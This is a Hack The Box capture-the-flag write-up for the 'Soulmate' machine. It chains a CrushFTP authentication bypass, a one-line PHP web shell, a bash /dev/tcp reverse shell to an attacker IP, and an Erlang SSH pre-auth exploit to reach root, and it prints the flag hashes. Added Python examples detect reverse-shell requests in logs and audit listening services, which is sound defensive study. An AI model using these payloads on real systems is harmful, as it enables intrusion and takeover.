Soulmate - Hack The Box Machine

September 2025


User Flag

While scanning for subdomains, I found the ftp subdomain, which was running a vulnerable version of CrushFTP:

CVE-2025-31161

Running the exploit with the command:

python3 cve-2025-31161.py --target_host "ftp.soulmate.htb" --port 80 --target_user crushadmin --new_user pelele --password pelele

The exploit takes advantage of the default crushadmin user to create a new user with the credentials pelele:pelele.

Log in, open the Admin interface, and in the User Management tab change ben's credentials. This user is able to upload files to the server. Upload a shell to this user's files inside webProd:

<?php echo system($_GET['c']); ?>

Access it on:

http://soulmate.htb/shell.php?c=bash -c 'exec bash -i %26>%2Fdev%2Ftcp%2F10.10.16.107%2F4444 <%261'

Get a reverse shell as www-data.
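From the defender's side, the request above is what a web server log would record. The following is an added detection example, not part of the original writeup: it parses nginx "combined" access-log lines, URL-decodes each query-string value, and flags values that carry reverse-shell or command-execution indicators. The log lines are constructed for the example and the file name shell.php and the parameter name c are taken from the writeup; the log format is assumed to be the nginx default.

```python
import re
from urllib.parse import parse_qsl

# Constructed sample lines in nginx "combined" log format (not real server logs).
# The third line mirrors the URL-encoded reverse-shell request from the writeup.
SAMPLE_LOG = """\
10.10.16.107 - - [01/Sep/2025:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.10.16.107 - - [01/Sep/2025:10:00:05 +0000] "GET /shell.php?c=id HTTP/1.1" 200 64 "-" "curl/8.0"
10.10.16.107 - - [01/Sep/2025:10:00:09 +0000] "GET /shell.php?c=bash%20-c%20'exec%20bash%20-i%20%26>%2Fdev%2Ftcp%2F10.10.16.107%2F4444%20<%261' HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.10.16.107 - - [01/Sep/2025:10:00:12 +0000] "POST /login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# Minimal parser for the start of a combined-format line: client IP, timestamp,
# method, request target and status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Indicators evaluated against the *decoded* query values. Each pattern names
# one behaviour so an alert can say why it fired.
INDICATORS = [
    ("reverse-shell", re.compile(r"/dev/tcp/\d{1,3}(?:\.\d{1,3}){3}/\d+")),
    ("interactive-shell", re.compile(r"\bbash\s+-i\b|\bsh\s+-i\b")),
    ("shell-exec", re.compile(r"\b(?:exec|eval)\s+(?:ba)?sh\b")),
    ("recon-command", re.compile(r"^(?:id|whoami|uname(?:\s+-a)?)$")),
]


def decode_query_values(target: str) -> list[tuple[str, str]]:
    """Split the request target's query string into (param, decoded value) pairs.

    parse_qsl percent-decodes each value, so %26 and %2F become '&' and '/'
    before the indicators are applied.
    """
    query = target.partition("?")[2]
    return parse_qsl(query, keep_blank_values=True)


def scan_request(target: str) -> list[str]:
    """Return the indicator names that fire on any decoded query value of one request."""
    hits: list[str] = []
    for _param, value in decode_query_values(target):
        for name, pattern in INDICATORS:
            if pattern.search(value) and name not in hits:
                hits.append(name)
    return hits


def scan_log(text: str) -> list[dict]:
    """Scan a block of access-log text and return one finding per suspicious request."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # lines that do not parse are skipped, not treated as hits
        hits = scan_request(m["target"])
        if hits:
            findings.append(
                {"ip": m["ip"], "ts": m["ts"], "target": m["target"], "indicators": hits}
            )
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding["ts"], finding["ip"], finding["indicators"], finding["target"])
```

Decoding before matching is the point of the example: the raw request target never contains the string /dev/tcp, so a rule that matches the undecoded log line misses it. The same check can be extended to POST bodies or to the query parameter of any uploaded script, not just shell.php.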

List listening ports with LinPEAS:

╔══════════╣ Active Ports
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#open-ports
tcp        0      0 127.0.0.1:9090          0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      1149/nginx: worker
tcp        0      0 127.0.0.1:2222          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:8443          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:45109         0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:4369          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:8080          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:46589         0.0.0.0:*               LISTEN      -
tcp6       0      0 ::1:4369                :::*                    LISTEN      -
tcp6       0      0 :::80                   :::*                    LISTEN      1149/nginx: worker
tcp6       0      0 :::22                   :::*                    LISTEN      -

On port 2222:

nc localhost 2222
SSH-2.0-Erlang/5.2.9

This version is vulnerable to CVE-2025-32433.
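The port listing and the banner check above are the two facts a defender would want to automate on such a host: which services are bound only to loopback (and so invisible to an external scan) and whether an SSH daemon identifies itself as the Erlang/OTP ssh application. The following is an added example, not part of the original writeup, covering both passages: it parses netstat-style lines as printed by LinPEAS and classifies each listener, and it parses an SSH identification string so the implementation and version can be compared with a fixed version that the caller supplies (the fixed version is a placeholder to be taken from the OTP advisory, not a value from this page). The sample port lines are excerpted from the listing above and embedded here as constructed input.

```python
import re
from dataclasses import dataclass

# Constructed excerpt in netstat / LinPEAS "Active Ports" format (subset of the
# writeup's listing, embedded here as sample input).
SAMPLE_PORTS = """\
tcp        0      0 127.0.0.1:9090          0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      1149/nginx: worker
tcp        0      0 127.0.0.1:2222          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp6       0      0 ::1:4369                :::*                    LISTEN      -
tcp6       0      0 :::80                   :::*                    LISTEN      1149/nginx: worker
"""


@dataclass
class Listener:
    proto: str
    addr: str
    port: int
    pid_program: str  # "PID/Program name" column, or "-" when not readable

    @property
    def loopback_only(self) -> bool:
        """True when the socket is bound to a loopback address only."""
        return self.addr.startswith("127.") or self.addr == "::1"


# One netstat line: proto, recv-q, send-q, local addr:port, foreign addr, state, program.
# `(\S+):(\d+)` backtracks so that ":::80" yields addr "::" and port 80.
LINE_RE = re.compile(r"^(tcp6?)\s+\d+\s+\d+\s+(\S+):(\d+)\s+\S+\s+LISTEN\s+(.*)$")


def parse_listeners(text: str) -> list[Listener]:
    """Parse TCP LISTEN lines; lines in any other format are ignored."""
    out = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            proto, addr, port, prog = m.groups()
            out.append(Listener(proto, addr, int(port), prog.strip()))
    return out


def exposed_listeners(listeners: list[Listener]) -> list[Listener]:
    """Listeners reachable from outside the host (wildcard or non-loopback bind)."""
    return [l for l in listeners if not l.loopback_only]


def local_only_ports(listeners: list[Listener]) -> list[int]:
    """Ports that an external port scan cannot see but a local process can reach."""
    return sorted({l.port for l in listeners if l.loopback_only})


# RFC 4253 identification string: SSH-protoversion-softwareversion [SP comments]
BANNER_RE = re.compile(r"^SSH-(?P<proto>\d\.\d+)-(?P<software>\S+)(?: (?P<comment>.*))?$")


def parse_ssh_banner(banner: str) -> dict:
    """Split an SSH banner into protocol, implementation and a numeric version tuple.

    The version is only extracted for the "name/x.y.z" form used by the Erlang
    ssh application (e.g. "SSH-2.0-Erlang/5.2.9"); other forms yield ().
    """
    m = BANNER_RE.match(banner.strip())
    if not m:
        raise ValueError(f"not an SSH identification string: {banner!r}")
    impl, _, ver = m["software"].partition("/")
    version = tuple(int(p) for p in ver.split(".") if p.isdigit()) if ver else ()
    return {
        "proto": m["proto"],
        "implementation": impl,
        "version": version,
        "comment": m["comment"] or "",
    }


def flags_erlang_ssh(banner: str, fixed_version: tuple) -> bool:
    """True when the banner is an Erlang/OTP ssh daemon older than fixed_version.

    fixed_version is a caller-supplied placeholder (e.g. (5, 2, 10)); take the
    real value from the OTP advisory for CVE-2025-32433 rather than from here.
    """
    info = parse_ssh_banner(banner)
    return info["implementation"] == "Erlang" and info["version"] < fixed_version


if __name__ == "__main__":
    listeners = parse_listeners(SAMPLE_PORTS)
    print("exposed:", [(l.addr, l.port, l.pid_program) for l in exposed_listeners(listeners)])
    print("loopback only:", local_only_ports(listeners))
    print(parse_ssh_banner("SSH-2.0-Erlang/5.2.9"))
```

On this host the loopback-only list is what makes the finding: port 2222 is not visible from the network, so the Erlang SSH banner only appears once you already have a local shell. An inventory that records loopback listeners alongside their banners catches the same exposure before an attacker does.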

python3 CVE-2025-32433.py
[*] Connecting to SSH server...
[+] Received banner: SSH-2.0-Erlang/5.2.9
12`|g"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,ext-info-s,kex-strict-s-v00@openssh.com9ssh-ed25519,ecdsa-sha2-nistp256,rsa-sha2-512,rsa-sha2-256aes256-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-gcm@openssh.com,aes128-ctr,chacha20-poly1305@openssh.com,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbcaes256-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-gcm@openssh.com,aes128-ctr,chacha20-poly1305@openssh.com,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc{hmac-sha2-512-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-256,hmac-sha1-etm@openssh.com,hmac-sha1{hmac-sha2-512-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-256,hmac-sha1-etm@openssh.com,hmac-sha1none,zlib@openssh.com,zlibnone,zlib@openssh.com,zlib
[*] Sending SSH_MSG_KEXINIT...
[*] Sending SSH_MSG_CHANNEL_OPEN...
[*] Sending SSH_MSG_CHANNEL_REQUEST (pre-auth)...
[✓] Exploit sent! If the server is vulnerable, it should have written to /lab.txt.
[+] Received response: 000000000000d4b0cfa302073dfe

This way, I got a shell as root, bypassed the first user exploit, and got through to root in one step.

root@soulmate:/# cat /home/ben/user.txt
cat /home/ben/user.txt
c22c9116f1d2daaea0aec8406c4870bd
root@soulmate:/# cat /root/root.txt
cat /root/root.txt
e737606e7878c79fa43a9980c99e15d7